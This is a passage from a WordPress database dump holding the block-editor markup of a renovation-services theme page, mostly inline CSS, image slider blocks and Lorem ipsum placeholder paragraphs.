class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"7ca68574-412c-4830-b622-e36d4f00ea49\"} -->\n<style type=\"text/css\"> .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7ca68574-412c-4830-b622-e36d4f00ea49 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7ca68574-412c-4830-b622-e36d4f00ea49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"24b580d3-82a8-4aa7-832b-5128d624b5e1\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-24b580d3-82a8-4aa7-832b-5128d624b5e1 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-24b580d3-82a8-4aa7-832b-5128d624b5e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Siding','','inherit','closed','closed','','215-revision-v1','','','2022-08-23 18:29:51','2022-08-23 18:29:51','',215,'https://cteisys.com/?p=431',0,'revision','',0),(343,1,'2021-05-27 06:57:20','2021-05-27 06:57:20','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6f372dab-359c-4ae1-a2b7-dc258b120810\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-6f372dab-359c-4ae1-a2b7-dc258b120810 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6f372dab-359c-4ae1-a2b7-dc258b120810.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6f372dab-359c-4ae1-a2b7-dc258b120810.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6f372dab-359c-4ae1-a2b7-dc258b120810 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6f372dab-359c-4ae1-a2b7-dc258b120810.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7b0be55b-95f2-4dda-9415-6a6ced91d15e\"} -->\n<style type=\"text/css\"> .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b0be55b-95f2-4dda-9415-6a6ced91d15e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7b0be55b-95f2-4dda-9415-6a6ced91d15e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"5e18049b-50fc-425e-8b7c-9e723ae23c48\"} -->\n<style type=\"text/css\"> .block-5e18049b-50fc-425e-8b7c-9e723ae23c48 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5e18049b-50fc-425e-8b7c-9e723ae23c48 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5e18049b-50fc-425e-8b7c-9e723ae23c48 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5e18049b-50fc-425e-8b7c-9e723ae23c48 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5e18049b-50fc-425e-8b7c-9e723ae23c48 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5e18049b-50fc-425e-8b7c-9e723ae23c48\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"92739333-715a-44bc-80b4-2329323f8c43\"} -->\n<style type=\"text/css\"> .block-92739333-715a-44bc-80b4-2329323f8c43 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-92739333-715a-44bc-80b4-2329323f8c43 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-92739333-715a-44bc-80b4-2329323f8c43 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-92739333-715a-44bc-80b4-2329323f8c43 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-92739333-715a-44bc-80b4-2329323f8c43 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-92739333-715a-44bc-80b4-2329323f8c43\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3ad01d29-a5de-49e5-9fc1-a1be45375724\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3ad01d29-a5de-49e5-9fc1-a1be45375724 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3ad01d29-a5de-49e5-9fc1-a1be45375724\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"e8b89d0f-3453-4c0e-adec-ca1d44f75b3a\"} -->\n<style type=\"text/css\"> .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e8b89d0f-3453-4c0e-adec-ca1d44f75b3a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b\"} -->\n<style type=\"text/css\"> .block-f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f0aa6e57-6ddb-4710-b7e5-79d91ddc3b7b\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"491ee171-3fb6-4bfd-b79e-b2d206836dfe\"} -->\n<style type=\"text/css\"> .block-id-491ee171-3fb6-4bfd-b79e-b2d206836dfe .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-491ee171-3fb6-4bfd-b79e-b2d206836dfe .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-491ee171-3fb6-4bfd-b79e-b2d206836dfe .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-491ee171-3fb6-4bfd-b79e-b2d206836dfe is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading 